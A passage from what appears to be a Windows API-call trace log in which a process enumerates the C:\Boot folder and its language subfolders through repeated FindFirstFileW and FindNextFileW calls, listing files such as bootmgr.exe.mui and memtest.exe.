out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.884] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0033.884] FindClose (in: hFindFile=0xba8ba0 | out: hFindFile=0xba8ba0) returned 1 [0033.884] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0033.884] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0033.884] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8ba0 [0033.886] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.886] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.886] FindClose (in: hFindFile=0xba8ba0 | out: hFindFile=0xba8ba0) returned 1 [0033.886] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0033.886] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0033.886] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8ba0 [0033.886] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.886] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.886] FindClose (in: hFindFile=0xba8ba0 | out: hFindFile=0xba8ba0) returned 1 [0033.886] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0033.886] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0033.887] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8ba0 [0033.887] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.887] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.888] FindClose (in: hFindFile=0xba8ba0 | out: hFindFile=0xba8ba0) returned 1 [0033.888] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0033.888] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0033.888] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8ba0 [0033.888] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.888] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.888] FindClose (in: hFindFile=0xba8ba0 | out: hFindFile=0xba8ba0) returned 1 [0033.888] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0033.888] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0033.888] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8ba0 [0033.889] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.889] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.889] FindClose (in: hFindFile=0xba8ba0 | out: hFindFile=0xba8ba0) returned 1 [0033.889] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0033.889] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0033.890] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8ba0 [0033.890] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.890] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.890] FindClose (in: hFindFile=0xba8ba0 | out: hFindFile=0xba8ba0) returned 1 [0033.890] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0033.890] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0033.890] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8ba0 [0033.891] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.891] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.891] FindClose (in: hFindFile=0xba8ba0 | out: hFindFile=0xba8ba0) returned 1 [0033.891] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0033.891] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0033.891] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8ba0 [0033.892] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.892] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.892] FindClose (in: hFindFile=0xba8ba0 | out: hFindFile=0xba8ba0) returned 1 [0033.892] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0033.892] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0033.892] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8ba0 [0033.895] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.895] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.895] FindClose (in: hFindFile=0xba8ba0 | out: hFindFile=0xba8ba0) returned 1 [0033.896] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0033.896] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0033.896] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba8ba0 [0033.896] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.896] FindNextFileW (in: hFindFile=0xba8ba0, lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.896] FindClose (in: hFindFile=0xba8ba0 | out: hFindFile=0xba8ba0) returned 1 [0033.896] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x2eb0088 | out: hHeap=0xb10000) returned 1 [0033.896] FindNextFileW (in: hFindFile=0xba8b60, lpFindFileData=0x352fa84 | out: lpFindFileData=0x352fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0033.896] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x352f808 | out: lpFindFileData=0x352f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, 